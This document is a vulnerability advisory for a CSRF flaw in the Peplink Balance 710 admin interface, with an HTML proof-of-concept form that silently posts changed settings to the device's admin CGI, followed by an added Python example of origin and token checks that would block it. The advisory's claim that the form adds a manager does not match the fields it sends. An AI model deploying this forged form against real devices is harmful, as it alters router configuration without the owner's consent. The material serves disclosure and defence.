# Affected software: Peplink Balance 710
# Type of vulnerability: CSRF
# URL: peplink.com <http://balancedemo.peplink.com/cgi-bin/MANGA/admin.cgi>
# Discovered by: provensec
# Website: provensec.com

# Version: 710
# Proof of concept

A new manager can be added using a CSRF attack:

<html>

  <body>
    <form action="http://balancedemo.peplink.com/cgi-bin/MANGA/admin.cgi" method="POST">
      <input type="hidden" name="section" value="EQOS&#95;group&#95;modify" />
      <input type="hidden" name="rule&#95;id" value="" />
      <input type="hidden" name="iptype" value="0" />
      <input type="hidden" name="ipaddr" value="123&#46;123&#46;1&#46;23" />
      <input type="hidden" name="netmask" value="24" />
      <input type="hidden" name="group" value="0" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
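
A server-side check that would reject the forged form above, as an added example (not Peplink's code and not part of the original advisory). It assumes a hypothetical handler that holds a per-session secret, a hidden `csrf_token` form field, and the demo host as the only allowed admin origin; all function and field names are illustrative.

```python
import hashlib
import hmac
from urllib.parse import urlsplit

# Assumption: the only origin the admin UI is legitimately served from.
ALLOWED_ORIGINS = {"http://balancedemo.peplink.com"}
STATE_CHANGING = {"POST", "PUT", "PATCH", "DELETE"}


def issue_token(session_secret, session_id):
    """Derive the per-session anti-CSRF token embedded in every admin form."""
    return hmac.new(session_secret, session_id.encode(), hashlib.sha256).hexdigest()


def request_origin(headers):
    """Return scheme://host[:port] from Origin, falling back to Referer."""
    value = headers.get("Origin") or headers.get("Referer")
    if not value or value == "null":
        return None
    parts = urlsplit(value)
    if parts.scheme and parts.netloc:
        return f"{parts.scheme}://{parts.netloc}"
    return None


def check_csrf(method, headers, form, session_secret, session_id):
    """Return (allowed, reason) for a request to the admin CGI."""
    if method.upper() not in STATE_CHANGING:
        return True, "safe method"
    # First layer: a browser-supplied origin that is not ours is rejected.
    origin = request_origin(headers)
    if origin is not None and origin not in ALLOWED_ORIGINS:
        return False, "cross-origin request"
    # Second layer: the token must match, compared in constant time.
    expected = issue_token(session_secret, session_id)
    supplied = form.get("csrf_token", "")
    if not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False, "missing or invalid token"
    return True, "ok"


# Constructed sample: the fields submitted by the proof-of-concept form.
POC_FORM = {"section": "EQOS_group_modify", "rule_id": "", "iptype": "0",
            "ipaddr": "123.123.1.23", "netmask": "24", "group": "0"}
```

The token check is what stops the request when a browser omits both `Origin` and `Referer`; the origin check alone is not sufficient.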